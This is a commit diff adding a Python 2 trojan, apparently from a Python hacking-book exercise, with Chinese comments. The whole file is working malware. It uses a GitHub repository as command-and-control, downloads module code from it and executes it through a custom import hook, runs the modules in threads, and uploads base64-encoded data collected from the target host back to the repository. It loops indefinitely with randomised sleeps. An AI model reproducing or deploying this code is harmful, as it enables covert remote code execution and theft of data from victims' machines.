|
| 1 | +#-*- coding:utf8 -*- |
| 2 | + |
| 3 | +import json |
| 4 | +import base64 |
| 5 | +import sys |
| 6 | +import time |
| 7 | +import imp |
| 8 | +import random |
| 9 | +import threading |
| 10 | +import Queue |
| 11 | +import os |
| 12 | + |
| 13 | +from github3 import login |
| 14 | + |
| 15 | +trojan_id = "abc" |
| 16 | + |
| 17 | +trojan_config = "%s.json" % trojan_id |
| 18 | +data_path = "chapter7/data/%s/" % trojan_id |
| 19 | +trojan_modules = [] |
| 20 | +configured = False |
| 21 | +task_queue = Queue.Queue() |
| 22 | + |
| 23 | + |
| 24 | +# 通过账号密码连接到github,获取repo和branch |
| 25 | +def connect_to_github(): |
| 26 | + gh = login(username="你的账号", password="你的密码") |
| 27 | + repo = gh.repository("你的账号,同上面的账号", "python-hacker-code(仓库名)") |
| 28 | + branch = repo.branch("master") |
| 29 | + |
| 30 | + return gh,repo,branch |
| 31 | + |
| 32 | +# 从远程仓库中获取文件 |
| 33 | +def get_file_contents(filepath): |
| 34 | + |
| 35 | + gh, repo, branch = connect_to_github() |
| 36 | + tree = branch.commit.commit.tree.recurse() |
| 37 | + |
| 38 | + for filename in tree.tree: |
| 39 | + |
| 40 | + if filepath in filename.path: |
| 41 | + print "[*] Found file %s" % filepath |
| 42 | + blob = repo.blob(filename._json_data['sha']) |
| 43 | + return blob.content |
| 44 | + |
| 45 | + return None |
| 46 | + |
| 47 | +# 获取木马的配置文件,并导入模块 |
| 48 | +def get_trojan_config(): |
| 49 | + global configured |
| 50 | + config_json = get_file_contents(trojan_config) |
| 51 | + config = json.loads(base64.b64decode(config_json)) |
| 52 | + configured = True |
| 53 | + |
| 54 | + for task in config: |
| 55 | + if task['module'] not in sys.modules: |
| 56 | + exec("import %s" % task['module']) |
| 57 | + |
| 58 | + return config |
| 59 | + |
| 60 | +# 将从目标主机收集到的数据推送到仓库中 |
| 61 | +def store_module_result(data): |
| 62 | + |
| 63 | + gh, repo, branch = connect_to_github() |
| 64 | + remote_path = "chapter7/data/%s/%d.data" % (trojan_id, random.randint(10,10000000)) |
| 65 | + repo.create_file(remote_path,"Commit message",base64.b64encode(data)) |
| 66 | + |
| 67 | + return |
| 68 | + |
| 69 | +def module_runner(module): |
| 70 | + |
| 71 | + # 将1加入到队列中 |
| 72 | + task_queue.put(1) |
| 73 | + result = sys.modules[module].run(a=1,b=2,c=3) |
| 74 | + # 从队列中移除 |
| 75 | + task_queue.get() |
| 76 | + |
| 77 | + # 保存结果到我们的仓库中 |
| 78 | + store_module_result(result) |
| 79 | + |
| 80 | + return |
| 81 | + |
| 82 | +class GitImporter(object): |
| 83 | + def __init__(self): |
| 84 | + self.current_module_code = "" |
| 85 | + |
| 86 | + # 尝试获取模块所在位置 |
| 87 | + def find_module(self, fullname, path=None): |
| 88 | + if configured: |
| 89 | + print "[*] Attempting to retrieve %s" % fullname |
| 90 | + new_library = get_file_contents("chapter7/modules/%s" % fullname) |
| 91 | + |
| 92 | + if new_library is not None: |
| 93 | + self.current_module_code = base64.b64decode(new_library) |
| 94 | + # 返回self变量,告诉python解析器找到了所需的模块 |
| 95 | + return self |
| 96 | + |
| 97 | + return None |
| 98 | + |
| 99 | + # 完成模块的实际加载过程 |
| 100 | + def load_module(self, name): |
| 101 | + # 创建一个空的模块对象 |
| 102 | + module = imp.new_module(name) |
| 103 | + # 将github中获得的代码导入的这个对象中 |
| 104 | + exec self.current_module_code in module.__dict__ |
| 105 | + # 最后将这个新建的模块添加到sys.modules列表里面 |
| 106 | + sys.modules[name] = module |
| 107 | + |
| 108 | + return module |
| 109 | + |
| 110 | + |
| 111 | + |
| 112 | +# 添加自定义的模块导入器 |
| 113 | +sys.meta_path = [GitImporter()] |
| 114 | +# 木马循环 |
| 115 | +while True: |
| 116 | + |
| 117 | + if task_queue.empty(): |
| 118 | + # 获取木马配置文件 |
| 119 | + config = get_trojan_config() |
| 120 | + for task in config: |
| 121 | + # 对每个模块单独建立线程 |
| 122 | + t = threading.Thread(target=module_runner, args=(task['module'],)) |
| 123 | + t.start() |
| 124 | + time.sleep(random.randint(1,10)) |
| 125 | + |
| 126 | + time.sleep(random.randint(1000,10000)) |
| 127 | + |
| 128 | + |
| 129 | + |
0 commit comments